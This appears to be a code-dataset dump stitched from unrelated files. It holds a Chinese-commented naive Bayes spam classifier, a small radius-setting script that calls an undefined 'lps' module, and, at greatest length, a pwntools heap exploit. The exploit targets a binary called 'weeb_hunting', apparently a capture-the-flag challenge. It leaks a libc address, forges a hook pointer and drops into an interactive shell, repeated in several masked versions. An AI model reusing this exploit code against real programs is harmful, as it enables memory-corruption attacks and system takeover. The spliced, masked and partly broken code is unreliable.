"step-1": "\n# coding=utf-8\n\nfrom numpy import *\n\n\"\"\" 1\n函数loadDataSet()创建了一些实验样本。 该函数返回的第一个变量是进行词条切分后的文档集合, 这些文档来自斑点犬爱好者留言\n板。 这些留言文本被切分成一系列的词条集合, 标点符号从文本中去掉, \nloadDataSet( )函数返回的第二个\n变量是一个类别标签的集合。 这里有两类, 侮辱性和非侮辱性。 这些文本的类别由人工标注, 这些标注信息用于训练程序以便自动检测侮辱性留言\n\"\"\"\ndef loadDataSet():\n postingList=[['my', 'dog', 'has', 'flea', 'problems', 'help', 'please'],\n ['maybe', 'not', 'take', 'him', 'to', 'dog', 'park', 'stupid'],\n ['my', 'dalmation', 'is', 'so', 'cute', 'I', 'love', 'him'],\n ['stop', 'posting', 'stupid', 'worthless', 'garbage'],\n ['mr', 'licks', 'ate', 'my', 'steak', 'how', 'to', 'stop', 'him'],\n ['quit', 'buying', 'worthless', 'dog', 'food', 'stupid']]\n classVec = [0,1,0,1,0,1] #1 is abusive, 0 not\n return postingList,classVec\n\n\"\"\" 2 \n函数createVocabList()会创建一个包含在所有文档中出现的不重复词的列表, 为此使用了Python的set数据类型。 将词条列表输给\nset构造函数, set就会返回一个不重复词表。 首先, 创建一个空集合❶, 然后将每篇文档返回的新词集合添加到该集合中❷。 操作符|用于\n求两个集合的并集, 这也是一个按位或(OR) 操作符在数学符号表示上, 按位或操作与集合求并操作使用相同记号\n\"\"\"\ndef createVocabList(dataSet):\n vocabSet = set([]) #create empty set\n for document in dataSet:\n vocabSet = vocabSet | set(document) #union of the two sets\n return list(vocabSet)\n\n\"\"\" 3 \n获得词汇表后, 便可以使用函数setOfWords2Vec(), 该函数的输入参数为词汇表及某个文档, 输出的是文档向量, 向量的每一元素为1或0,\n分别表示词汇表中的单词在输入文档中是否出现。 函数首先创建一个和词汇表等长的向量, 并将其元素都设置为0❸。 接着, 遍历文档中的所有单词,\n 如果出现了词汇表中的单词, 则将输出的文档向量中的对应值\n设为1。 一切都顺利的话, 就不需要检查某个词是否还在vocabList中, 后边可能会用到这一操作\n\"\"\"\ndef setOfWords2Vec(vocabList, inputSet):\n returnVec = [0]*len(vocabList)\n for word in inputSet:\n if word in vocabList:\n returnVec[vocabList.index(word)] = 1\n return returnVec\n\n\"\"\"\n先看看前三个函数的执行效果\n\"\"\"\n\ndef test1():\n listPosts, listClass = loadDataSet()\n mVocabList = createVocabList(listPosts)\n print mVocabList\n setOfWords2Vec(mVocabList, listPosts[0])\n\n# test1()\n\n\n# ---------------------------训练算法: 从词向量计算概率--------------------------\n\n\"\"\"\n函数中的输入参数为文档矩阵trainMatrix, 以及由每篇文档类别标签所构成的向量trainCategory。 首先, 计算文档属于侮辱性文档\n(class=1) 的概率, 即P(1)。 因为这是一个二类分类问题, 所以可以通过1-P(1)得到P(0)。 对于多于两类的分类问题, 则需要对代码稍加\n修改。计算p(wi|c1) 和p(wi|c0), 需要初始化程序中的分子变量和分母变量❶。 由于w中元素如此众多, 因此可以使用NumPy数组快速计算这些\n值。 上述程序中的分母变量是一个元素个数等于词汇表大小的NumPy数组。 在for循环中, 要遍历训练集trainMatrix中的所有文档。 一旦某\n个词语(侮辱性或正常词语) 在某一文档中出现, 则该词对应的个数(p1Num或者p0Num) 就加1, 而且在所有的文档中, 该文档的总词数也\n相应加1❷。 对于两个类别都要进行同样的计算处理。最后, 对每个元素除以该类别中的总词数❸。 利用NumPy可以很好实现, \n用一个数组除以浮点数即可, 若使用常规的Python列表则难以完成这种任务, 读者可以自己尝试一下。 最后, 函数会返回两个向量和一个概率。\n\"\"\"\ndef trainNB0(trainMatrix,trainCategory):\n numTrainDocs = len(trainMatrix)\n numWords = len(trainMatrix[0])\n pAbusive = sum(trainCategory)/float(numTrainDocs)\n # 1. (以下两行) 初始化概率\n \"\"\"\n 利用贝叶斯分类器对文档进行分类时, 要计算多个概率的乘积以获得文档属于某个类别的概率, 即计算p(w0|1)p(w1|1)p(w2|1)。 如果其中一\n 个概率值为0, 那么最后的乘积也为0。 为降低这种影响, 可以将所有词的出现数初始化为1, 并将分母初始化为2\n \"\"\"\n p0Num = ones(numWords); p1Num = ones(numWords) # change to ones()\n p0Denom = 2.0; p1Denom = 2.0 # change to 2.0\n for i in range(numTrainDocs):\n if trainCategory[i] == 1:\n # 2. (以下两行) 向量相加\n p1Num += trainMatrix[i]\n p1Denom += sum(trainMatrix[i])\n else:\n p0Num += trainMatrix[i]\n p0Denom += sum(trainMatrix[i])\n # 3. 对每个元素做除法\n \"\"\"\n 另一个遇到的问题是下溢出, 这是由于太多很小的数相乘造成的。 当计算乘积p(w0|ci)p(w1|ci)p(w2|ci)...p(wN|ci)时, 由于大部分因子都\n 非常小, 所以程序会下溢出或者得到不正确的答案。 (读者可以用Python尝试相乘许多很小的数, 最后四舍五入后会得到0。 ) 一种解决\n 办法是对乘积取自然对数。 在代数中有ln(a*b) = ln(a)+ln(b), 于是通过求对数可以避免下溢出或者浮点数舍入导致的错误。 同时, 采用\n 自然对数进行处理不会有任何损失。 图4-4给出函数f(x)与ln(f(x))的曲线。 检查这两条曲线, 就会发现它们在相同区域内同时增加或者减\n 少, 并且在相同点上取到极值。 它们的取值虽然不同, 但不影响最终结果。 通过修改return前的两行代码, 将上述做法用到分类器中:\n \"\"\"\n p1Vect = log(p1Num/p1Denom) # change to log()\n p0Vect = log(p0Num/p0Denom) # change to log()\n return p0Vect,p1Vect,pAbusive\n\n\ndef test2():\n listPosts, listClass = loadDataSet()\n # 构建了一个包含所有词的列表mVocabList\n mVocabList = createVocabList(listPosts)\n setOfWords2Vec(mVocabList, listPosts[0])\n trainMat = []\n for postinDoc in listPosts:\n temp = setOfWords2Vec(mVocabList, postinDoc)\n trainMat.append(temp)\n # 文档属于侮辱类的概率pAb\n p0v, p1v, pAb = trainNB0(trainMat, listClass)\n print pAb\n\n\"\"\"\n接下来看一看在给定文档类别条件下词汇表中单词的出现概率, 看看是否正确。 词汇表中的第一个词是cute, 其在类别0中出现1次, 而在类别1中\n从未出现。 对应的条件概率分别为0.041 666 67与0.0。 该计算是正确的。 我们找找所有概率中的最大值, 该值出现在P(1)数组第26个下标位\n置, 大小为0.157 894 74。 在myVocabList的第26个下标位置上可以查到该单词是stupid。 这意味着stupid是最能表征类别1(侮辱性文档类)的单词。\n\"\"\"\n\n\n\"\"\"\n代码有4个输入: 要分类的向量vec2Classify以及使用函数trainNB0()计算得到的三个概率。 使用NumPy的数组来计算两个\n向量相乘的结果❶。 这里的相乘是指对应元素相乘, 即先将两个向量中的第1个元素相乘, 然后将第2个元素相乘, 以此类推。 接下来将词汇表\n中所有词的对应值相加, 然后将该值加到类别的对数概率上。 最后, 比较类别的概率返回大概率对应的类别标签。 这一切不是很难, 对吧?\n\"\"\"\ndef classifyNB(vec2Classify, p0Vec, p1Vec, pClass1):\n # 1. 元素相乘 分类计算的核心\n p1 = sum(vec2Classify * p1Vec) + log(pClass1) # element-wise mult\n p0 = sum(vec2Classify * p0Vec) + log(1.0 - pClass1)\n if p1 > p0:\n return 1\n else: \n return 0\n\n\n\"\"\"\n对文本做一些修改, 看看分类器会输出什么结果。 这个例子非常简单,但是它展示了朴素贝叶斯分类器的工作原理。\n 接下来,我们会对代码做些修改, 使分类器工作得更好。\n 函数setOfWords2Vec()稍加修改, 修改后的函数称为bagOfWords2Vec()\n -----------------------------------准备数据: 文档词袋模型---------------------------------------\n\"\"\"\n\n\ndef bagOfWords2VecMN(vocabList, inputSet):\n returnVec = [0]*len(vocabList)\n for word in inputSet:\n if word in vocabList:\n # todo 这个词的操作\n returnVec[vocabList.index(word)] += 1\n return returnVec\n\n\n\"\"\"\n函数是一个便利函数(convenience function) , 该函数封装所有操作, 以节省输入\n\"\"\"\n\n\ndef testingNB():\n listOPosts,listClasses = loadDataSet()\n myVocabList = createVocabList(listOPosts)\n trainMat=[]\n for postinDoc in listOPosts:\n trainMat.append(setOfWords2Vec(myVocabList, postinDoc))\n p0V,p1V,pAb = trainNB0(array(trainMat),array(listClasses))\n testEntry = ['love', 'my', 'dalmation']\n thisDoc = array(setOfWords2Vec(myVocabList, testEntry))\n print (testEntry,'classified as: ',classifyNB(thisDoc,p0V,p1V,pAb))\n testEntry = ['stupid', 'garbage']\n thisDoc = array(setOfWords2Vec(myVocabList, testEntry))\n print (testEntry,'classified as: ',classifyNB(thisDoc,p0V,p1V,pAb))\n\n\n# testingNB()\n\n# -----------------------------------使用朴素贝叶斯过滤垃圾邮件----------------------------\n\n\"\"\"\n准备数据: 切分文本\n可以看到, 切分的结果不错, 但是标点符号也被当成了词的一部分。 可以使用正则表示式来切分句子, 其中分隔符是除单词、 数字外的任意字符串\n\"\"\"\ndef textParse(bigString): #input is big string, #output is word list\n import re\n listOfTokens = re.split(r'\\W*', bigString)\n return [tok.lower() for tok in listOfTokens if len(tok) > 2] \n\n\"\"\"\"\n函数spamTest()对贝叶斯垃圾邮件分类器进行自动化处理。 导入文件夹spam与ham下的文本文件, 并将它们解析为词列表❶。 接下来\n构建一个测试集与一个训练集, 两个集合中的邮件都是随机选出的。 本例中共有50封电子邮件, 并不是很多, 其中的10封电子邮件被随机选择\n为测试集。 分类器所需要的概率计算只利用训练集中的文档来完成。Python变量trainingSet是一个整数列表, 其中的值从0到49。 接下\n来, 随机选择其中10个文件❷。 选择出的数字所对应的文档被添加到测试集, 同时也将其从训练集中剔除。 这种随机选择数据的一部分作为训\n练集, 而剩余部分作为测试集的过程称为留存交叉验证(hold-out crossvalidation) 。 假定现在只完成了一次迭代, 那么为了更精确地估计分类\n器的错误率, 就应该进行多次迭代后求出平均错误率。接下来的for循环遍历训练集的所有文档, 对每封邮件基于词汇表并使\n用setOfWords2Vec()函数来构建词向量。 这些词在traindNB0()函数中用于计算分类所需的概率。 然后遍历测试集, 对其中每封电子邮件进\n行分类❸。 如果邮件分类错误, 则错误数加1, 最后给出总的错误百分比\n\"\"\"\ndef spamTest():\n docList=[]; classList = []; fullText =[]\n for i in range(1,26):\n wordList = textParse(open('email/spam/%d.txt' % i).read())\n docList.append(wordList)\n fullText.extend(wordList)\n classList.append(1)\n wordList = textParse(open('email/ham/%d.txt' % i).read())\n docList.append(wordList)\n fullText.extend(wordList)\n classList.append(0)\n vocabList = createVocabList(docList)# create vocabulary\n trainingSet = range(50); testSet=[] # create test set\n # (以下四行) 随机构建训练集\n for i in range(10):\n randIndex = int(random.uniform(0,len(trainingSet)))\n testSet.append(trainingSet[randIndex])\n # todo del这个操作步骤\n del(trainingSet[randIndex]) \n trainMat=[]; trainClasses = []\n # (以下四行) 对测试集分类\n for docIndex in trainingSet:#train the classifier (get probs) trainNB0\n trainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))\n trainClasses.append(classList[docIndex])\n # todo 入参出参的计算方法\n p0V,p1V,pSpam = trainNB0(array(trainMat),array(trainClasses))\n errorCount = 0\n for docIndex in testSet: #classify the remaining items\n wordVector = bagOfWords2VecMN(vocabList, docList[docIndex])\n if classifyNB(array(wordVector),p0V,p1V,pSpam) != classList[docIndex]:\n errorCount += 1\n print (\"classification error\",docList[docIndex])\n print ('the error rate is: ',float(errorCount)/len(testSet))\n #return vocabList,fullText\n\n# ------------------------自动化处理----------------------------------------\nspamTest()\n\n# ----------------------------- 4.7. 示例: 使用朴素贝叶斯分类器从个人广告中获取区域倾向---------------------------\n\n\"\"\"\"\nRSS源分类器及高频词去除函数\n函数calcMostFreq() ❶。 该函数遍历词汇表中的每个词并统计它在文本中出现的次数, 然后根据出现次数从高到低对词典进行排序,\n最后返回排序最高的30个单词。 你很快就会明白这个函数的重要性\n以下四行) 计算出现频率\n\"\"\"\ndef calcMostFreq(vocabList,fullText):\n import operator\n freqDict = {}\n for token in vocabList:\n freqDict[token]=fullText.count(token)\n sortedFreq = sorted(freqDict.iteritems(), key=operator.itemgetter(1), reverse=True) \n return sortedFreq[:30] \n\n\"\"\"\"\n函数localWords()使用两个RSS源作为参数。 RSS源要在函数外\n导入, 这样做的原因是RSS源会随时间而改变。 如果想通过改变代码来\n比较程序执行的差异, 就应该使用相同的输入。 重新加载RSS源就会得\n到新的数据, 但很难确定是代码原因还是输入原因导致输出结果的改\n变。 函数localWords()与程序清单4-5中的spamTest()函数几乎相\n同, 区别在于这里访问的是RSS源❷而不是文件。 然后调用函\n数calcMostFreq()来获得排序最高的30个单词并随后将它们移除❸。\n函数的剩余部分与spamTest()基本类似, 不同的是最后一行要返回下\n面要用到的值。\n\"\"\"\ndef localWords(feed1,feed0):\n import feedparser\n docList=[]; classList = []; fullText =[]\n minLen = min(len(feed1['entries']),len(feed0['entries']))\n for i in range(minLen):\n # 2 每次访问一条RSS源\n wordList = textParse(feed1['entries'][i]['summary'])\n docList.append(wordList)\n fullText.extend(wordList)\n classList.append(1) #NY is class 1\n wordList = textParse(feed0['entries'][i]['summary'])\n docList.append(wordList)\n fullText.extend(wordList)\n classList.append(0)\n # (以下四行) 去掉出现次数最高的那些词\n vocabList = createVocabList(docList)#create vocabulary\n top30Words = calcMostFreq(vocabList,fullText) #remove top 30 words\n for pairW in top30Words:\n if pairW[0] in vocabList: vocabList.remove(pairW[0])\n trainingSet = range(2*minLen); testSet=[] #create test set\n for i in range(20):\n randIndex = int(random.uniform(0,len(trainingSet)))\n testSet.append(trainingSet[randIndex])\n del(trainingSet[randIndex]) \n trainMat=[]; trainClasses = []\n for docIndex in trainingSet:#train the classifier (get probs) trainNB0\n trainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))\n trainClasses.append(classList[docIndex])\n p0V,p1V,pSpam = trainNB0(array(trainMat),array(trainClasses))\n errorCount = 0\n for docIndex in testSet: #classify the remaining items\n wordVector = bagOfWords2VecMN(vocabList, docList[docIndex])\n if classifyNB(array(wordVector),p0V,p1V,pSpam) != classList[docIndex]:\n errorCount += 1\n print ('the error rate is: ',float(errorCount)/len(testSet))\n return vocabList,p0V,p1V\n\ndef getTopWords(ny,sf):\n import operator\n vocabList,p0V,p1V=localWords(ny,sf)\n topNY=[]; topSF=[]\n for i in range(len(p0V)):\n if p0V[i] > -6.0 : topSF.append((vocabList[i],p0V[i]))\n if p1V[i] > -6.0 : topNY.append((vocabList[i],p1V[i]))\n sortedSF = sorted(topSF, key=lambda pair: pair[1], reverse=True)\n print (\"SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**\")\n for item in sortedSF:\n print (item[0])\n sortedNY = sorted(topNY, key=lambda pair: pair[1], reverse=True)\n print (\"NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**\")\n for item in sortedNY:\n print (item[0])\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python3
import sys
import csv
import math
import collections
import argparse
import fileinput
import lp
parser = argparse.ArgumentParser(description="Takes an input of *.lp format and sets all radii to the same value")
parser.add_argument("inputfile", help="if specified reads a *.lp formatted file otherwise standard in")
R = 1
def main():
reader = csv.reader(row for row in fileinput.input() if not row.startswith('#'))
circles = lps.parse_lps(reader)
for circle in circles:
circle.r = R
print(circle)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "00f62fec7f5372c5798b0ebf3f3783233360581e",
"index": 2987,
"step-1": "<mask token>\n\n\ndef main():\n reader = csv.reader(row for row in fileinput.input() if not row.\n startswith('#'))\n circles = lps.parse_lps(reader)\n for circle in circles:\n circle.r = R\n print(circle)\n\n\n<mask token>\n",
"step-2": "<mask token>\nparser.add_argument('inputfile', help=\n 'if specified reads a *.lp formatted file otherwise standard in')\n<mask token>\n\n\ndef main():\n reader = csv.reader(row for row in fileinput.input() if not row.\n startswith('#'))\n circles = lps.parse_lps(reader)\n for circle in circles:\n circle.r = R\n print(circle)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nparser = argparse.ArgumentParser(description=\n 'Takes an input of *.lp format and sets all radii to the same value')\nparser.add_argument('inputfile', help=\n 'if specified reads a *.lp formatted file otherwise standard in')\nR = 1\n\n\ndef main():\n reader = csv.reader(row for row in fileinput.input() if not row.\n startswith('#'))\n circles = lps.parse_lps(reader)\n for circle in circles:\n circle.r = R\n print(circle)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\nimport csv\nimport math\nimport collections\nimport argparse\nimport fileinput\nimport lp\nparser = argparse.ArgumentParser(description=\n 'Takes an input of *.lp format and sets all radii to the same value')\nparser.add_argument('inputfile', help=\n 'if specified reads a *.lp formatted file otherwise standard in')\nR = 1\n\n\ndef main():\n reader = csv.reader(row for row in fileinput.input() if not row.\n startswith('#'))\n circles = lps.parse_lps(reader)\n for circle in circles:\n circle.r = R\n print(circle)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python3\nimport sys\nimport csv\nimport math\n\nimport collections\nimport argparse\nimport fileinput\n\nimport lp\n\nparser = argparse.ArgumentParser(description=\"Takes an input of *.lp format and sets all radii to the same value\")\nparser.add_argument(\"inputfile\", help=\"if specified reads a *.lp formatted file otherwise standard in\")\n\nR = 1\n\ndef main():\n reader = csv.reader(row for row in fileinput.input() if not row.startswith('#'))\n\n circles = lps.parse_lps(reader)\n\n for circle in circles:\n circle.r = R\n print(circle)\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
pwnlib.gdb.attach(p)
<|reserved_special_token_0|>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
<|reserved_special_token_0|>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
<|reserved_special_token_0|>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('\n')
<|reserved_special_token_0|>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('\n')
p.send('\n')
<|reserved_special_token_0|>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('1')
<|reserved_special_token_0|>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
<|reserved_special_token_0|>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('A"`')
<|reserved_special_token_0|>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
<|reserved_special_token_0|>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
<|reserved_special_token_0|>
while 'You found a sword' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')
<|reserved_special_token_0|>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
<|reserved_special_token_0|>
log.info(hex(__srandom))
<|reserved_special_token_0|>
log.info('Fake chunk: ' + hex(hook))
p.sendline('2')
<|reserved_special_token_0|>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
<|reserved_special_token_0|>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
<|reserved_special_token_0|>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
<|reserved_special_token_0|>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
p = process('./weeb_hunting')
elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
pwnlib.gdb.attach(p)
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('\n')
p.send('\n')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('1')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('A"`')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a sword' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
__srandom = u64((r.split('1. ')[1].split('\n')[0] + '\x00' * 8)[:8])
log.info(hex(__srandom))
hook = __srandom + 3711517
log.info('Fake chunk: ' + hex(hook))
p.sendline('2')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
<|reserved_special_token_1|>
from pwn import *
p = process('./weeb_hunting')
elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
pwnlib.gdb.attach(p)
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('\n')
p.send('\n')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('1')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('A"`')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a sword' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
__srandom = u64((r.split('1. ')[1].split('\n')[0] + '\x00' * 8)[:8])
log.info(hex(__srandom))
hook = __srandom + 3711517
log.info('Fake chunk: ' + hex(hook))
p.sendline('2')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
<|reserved_special_token_1|>
from pwn import *
p = process("./weeb_hunting")
elf = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
pwnlib.gdb.attach(p)
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("AAAA\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("AAAA\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("\n")
p.send("\n")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("1")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("4")
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('\x41\x22\x60')
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while "You found a sword" not in r:
p.send("\n")
r = p.recv()
p.sendline("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
__srandom = u64((r.split("1. ")[1].split("\n")[0] + "\x00"*8)[:8])
log.info(hex(__srandom))
hook = __srandom + 0x38A21D
log.info("Fake chunk: " + hex(hook))
p.sendline("2")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("3")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("4")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("3")
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
|
flexible
|
{
"blob_id": "5eb4c71869b077dac0d61072c99d801030395fc2",
"index": 636,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npwnlib.gdb.attach(p)\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('\\n')\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('\\n')\np.send('\\n')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('1')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('A\"`')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\n<mask token>\nwhile 'You found a sword' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\n<mask token>\nlog.info(hex(__srandom))\n<mask token>\nlog.info('Fake chunk: ' + hex(hook))\np.sendline('2')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline(p64(hook)[:6])\np.interactive()\n",
"step-3": "<mask token>\np = process('./weeb_hunting')\nelf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')\npwnlib.gdb.attach(p)\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('\\n')\np.send('\\n')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('1')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('A\"`')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a sword' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\n__srandom = u64((r.split('1. ')[1].split('\\n')[0] + '\\x00' * 8)[:8])\nlog.info(hex(__srandom))\nhook = __srandom + 3711517\nlog.info('Fake chunk: ' + hex(hook))\np.sendline('2')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline(p64(hook)[:6])\np.interactive()\n",
